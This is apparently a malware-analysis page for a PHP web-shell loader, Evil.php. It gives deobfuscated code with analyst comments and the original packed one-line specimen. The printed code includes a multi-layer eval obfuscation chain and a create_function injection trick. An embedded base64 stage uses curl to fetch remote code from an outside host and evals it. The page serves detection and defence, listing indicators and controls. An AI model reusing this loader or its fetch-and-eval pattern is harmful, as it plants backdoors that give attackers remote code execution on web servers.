PHP Malware Analysis


Filename: Evil.php

Tags


Deobfuscated code

<?php

// ANALYST NOTE (outer layer): $et is the packed second stage. In the original one-line
// sample (see "Original code") it is unpacked with
// base64_decode -> str_rot13 -> gzinflate -> str_rot13 and the result is handed to eval().
// Static indicator: eval() wrapped around nested str_rot13/gzinflate/base64_decode calls.
$et = 'jUjbZaJAEP0Vy7LKsFhjc7iX5VASiU5wb0mNmpctICgqCihlMeW/L5BOh11F2beZmj6nQp/uhtrSaPYSB02V6mHALPtDFKwrXXuagiE3rrz8SWFJI9s31/IjQmiN1/h6sT+00d31ffP4y2yXYXvhpDNqf1GB+lnP2M3PrddrqDb3luYuAl2r2IZ28oC9qrmupSEE6U1gSzvEZGd64YcWJ1bUh7lbS6ZJqdeZPIpWzzgwO+PY5Nw81dahvpIBW3Zd2GQRH7xnos8XTj4x5wsrEC/JhXfWNqGrAUkq406AgJKcvFU8gBNdrydRZKzvESwVhFECnLASGuRHg6b7HhDEMqiUsl/iIVnj92Zwzgrct7UXRRWMVRQlPERr2AFJ+EllAiVV+RQ6P9o6hKjSypF0BtyYWTY2l6LPr9glOq859e7yigvLsEsclSTzaMNgxdIeFeslUoNHpq54C0EGcshPRKxn7m/8DqVFACi2AnIJaa5zyuXjw5IJVZm4iXsv4MozFYo6WPPW0QKB0q4LkKTPJzJjnQ3PkYC/U+kzzNIPvszKUdglAWmezo2kZoMo+hKEPcjcwUiRz0tq9owlpVoNPD+C8H+cc7NBGlhYUfDbU5Ibni3XZOH4PPrKBUEuzmwCsNf7OVdUu6QxxQG7nLNoTe7mviTLckAofLWW4ucYHcJLKO8tGVwYDJghnWh5ZU+pjSL4T3pJc3UfDFYg1Z4JY3jo3PTCkibupQZvW4nlxb7RuQ9ZXhWdi6Qopk2fjGH01xfgP7Kq7QxywznGYDrwZ2KsrNyNvpwhFXq7eOCh2JpoldgLa3rbRmev+3d6u9LSUofYGa0sYnwAEzsSMc+m30aW7ritp/yzwfOLqkHeOvD5oQcnUGio3mpv5b79wGqUVb2fDZ7W0848ZY/qxlhlEW3i3VUNpwMl3A4isd/rH5yBr916OHoWKGm/agOdZNu4XbVN9Srz78oj8nSDinDMCcSH8ypfO214mls7ZvWU/ONjSphto0RCtqTRmLvGNRTZPw==';
// ANALYST NOTE: the braces below are the deobfuscator's rendering of the code the outer
// eval() receives. "eval { ... }" is tool output, not valid PHP syntax.
eval /* PHPDeobfuscator eval output */ {
    // Lookup table. Every sensitive name below is assembled from single characters
    // indexed out of this string, so no function name appears literally in the stage.
    // Presumably this is meant to defeat plain string-signature scanning.
    $vcbf840 = "eC.vZ176u(onAK0F4H D_RNwGygrx9Y5)WpIlMtfhQ2P-S;mEbq8OXjJTsc*kiVB,L3z+ad/U";
    // String builder only: returns its three arguments concatenated.
    function yprr503($ccun221, $ipue244, $tgju488)
    {
        return '' . $ccun221 . '' . $ipue244 . '' . $tgju488 . '';
    }
    // Fragments "call" + "_use" + "r_f" + "un" + "c_ar" + "ray".
    $xjow903 = yprr503($vcbf840[58], "al", $vcbf840[36]);
    $zjcn038 = yprr503("_u", "se", '');
    $llof213 = yprr503($vcbf840[27], $vcbf840[20], $vcbf840[39]);
    $nogd067 = yprr503($vcbf840[8], '', $vcbf840[11]);
    $fsps364 = yprr503($vcbf840[58], $vcbf840[20], "ar");
    $kjhe036 = yprr503($vcbf840[27], $vcbf840[69], $vcbf840[25]);
    // $smyo112 resolves to the string "call_user_func_array".
    $smyo112 = yprr503(yprr503($xjow903, '', $zjcn038), yprr503($llof213, $nogd067, ''), yprr503($fsps364, '', $kjhe036));
    // Fragments "cre" + "at" + "e_" + "fun" + "ct" + "io" + "n".
    $gopp378 = yprr503($vcbf840[58], $vcbf840[27], $vcbf840[0]);
    $oont490 = yprr503($vcbf840[69], $vcbf840[38], '');
    $lllq180 = yprr503($vcbf840[0], '', $vcbf840[20]);
    $ecnr938 = yprr503($vcbf840[39], $vcbf840[8], $vcbf840[11]);
    $ffdi480 = yprr503($vcbf840[58], $vcbf840[38], '');
    $dxkt204 = yprr503($vcbf840[61], $vcbf840[10], '');
    $icbz544 = yprr503('', $vcbf840[11], '');
    // $uohg939 resolves to the string "create_function".
    $uohg939 = yprr503(yprr503($gopp378, $oont490, $lllq180), yprr503($ecnr938, '', $ffdi480), yprr503($dxkt204, '', $icbz544));
    // Fragments "ev" + "al(" + "ba" + "se6" + "4_d" + "eco" + "de(".
    $idgk110 = yprr503($vcbf840[0], '', $vcbf840[3]);
    $opvu721 = yprr503($vcbf840[69], $vcbf840[36], $vcbf840[9]);
    $mtbg524 = yprr503('', $vcbf840[49], $vcbf840[69]);
    $yxfs212 = yprr503($vcbf840[57], $vcbf840[0], $vcbf840[7]);
    $vesg899 = yprr503($vcbf840[16], $vcbf840[20], $vcbf840[70]);
    $ehjl604 = yprr503($vcbf840[0], $vcbf840[58], $vcbf840[10]);
    $bxlr460 = yprr503($vcbf840[70], $vcbf840[0], $vcbf840[9]);
    // $jyhp869 resolves to "eval(base64_decode('<literal below>'));".
    // The base64 literal is a third stage. Decoded, it calls curl_init() on
    // hxxps://eviltwin-dev[.]github[.]io/shell.txt (defanged), sets CURLOPT_RETURNTRANSFER,
    // runs curl_exec(), and passes the response to eval('?>' . $result).
    // This file is therefore only a loader: the executed code lives on the remote host,
    // is not part of this sample, and can change between requests. Outbound HTTPS from the
    // PHP worker to that host is the network indicator to hunt for and block.
    $jyhp869 = yprr503(yprr503($idgk110, $opvu721, ''), yprr503('', '', $mtbg524), yprr503($yxfs212, $vesg899 . $ehjl604, $bxlr460)) . "'JGNoID0gY3VybF9pbml0KCdodHRwczovL2V2aWx0d2luLWRldi5naXRodWIuaW8vc2hlbGwudHh0Jyk7Y3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCAxKTskcmVzdWx0ID0gY3VybF9leGVjKCRjaCk7ZXZhbCgnPz4nLiRyZXN1bHQpOw=='" . yprr503("))", '', $vcbf840[46]);
    // Effective call: call_user_func_array('create_function', ['', '}' . <eval stage> . '//']).
    // create_function() evals a generated function definition around the body string.
    // The leading '}' closes that wrapper early, so the stage runs at definition time,
    // and the trailing '//' comments out the wrapper's own closing brace.
    // create_function() was deprecated in PHP 7.2 and removed in PHP 8.0, so this path
    // only works on older runtimes. eval is a language construct and is not affected by
    // the disable_functions ini setting; egress filtering on the web tier and
    // file-integrity monitoring of the docroot are the applicable controls.
    $smyo112($uohg939, array('', '}' . $jyhp869 . '//'));
    // Marker comment left in the decoded stage; a low-confidence string indicator at best,
    // since it only becomes visible after the outer layer is unpacked.
    //scp-173
};


Original code

<?php /* ANALYST NOTE: specimen as found. $et is unpacked by base64_decode -> str_rot13 -> gzinflate -> str_rot13 and the result goes straight to eval(), so nothing readable appears in the file itself. The readable form of what eval() receives is the "Deobfuscated code" listing on this page. */ $et = 'jUjbZaJAEP0Vy7LKsFhjc7iX5VASiU5wb0mNmpctICgqCihlMeW/L5BOh11F2beZmj6nQp/uhtrSaPYSB02V6mHALPtDFKwrXXuagiE3rrz8SWFJI9s31/IjQmiN1/h6sT+00d31ffP4y2yXYXvhpDNqf1GB+lnP2M3PrddrqDb3luYuAl2r2IZ28oC9qrmupSEE6U1gSzvEZGd64YcWJ1bUh7lbS6ZJqdeZPIpWzzgwO+PY5Nw81dahvpIBW3Zd2GQRH7xnos8XTj4x5wsrEC/JhXfWNqGrAUkq406AgJKcvFU8gBNdrydRZKzvESwVhFECnLASGuRHg6b7HhDEMqiUsl/iIVnj92Zwzgrct7UXRRWMVRQlPERr2AFJ+EllAiVV+RQ6P9o6hKjSypF0BtyYWTY2l6LPr9glOq859e7yigvLsEsclSTzaMNgxdIeFeslUoNHpq54C0EGcshPRKxn7m/8DqVFACi2AnIJaa5zyuXjw5IJVZm4iXsv4MozFYo6WPPW0QKB0q4LkKTPJzJjnQ3PkYC/U+kzzNIPvszKUdglAWmezo2kZoMo+hKEPcjcwUiRz0tq9owlpVoNPD+C8H+cc7NBGlhYUfDbU5Ibni3XZOH4PPrKBUEuzmwCsNf7OVdUu6QxxQG7nLNoTe7mviTLckAofLWW4ucYHcJLKO8tGVwYDJghnWh5ZU+pjSL4T3pJc3UfDFYg1Z4JY3jo3PTCkibupQZvW4nlxb7RuQ9ZXhWdi6Qopk2fjGH01xfgP7Kq7QxywznGYDrwZ2KsrNyNvpwhFXq7eOCh2JpoldgLa3rbRmev+3d6u9LSUofYGa0sYnwAEzsSMc+m30aW7ritp/yzwfOLqkHeOvD5oQcnUGio3mpv5b79wGqUVb2fDZ7W0848ZY/qxlhlEW3i3VUNpwMl3A4isd/rH5yBr916OHoWKGm/agOdZNu4XbVN9Srz78oj8nSDinDMCcSH8ypfO214mls7ZvWU/ONjSphto0RCtqTRmLvGNRTZPw=='; eval(str_rot13(gzinflate(str_rot13(base64_decode("$et"))))); ?>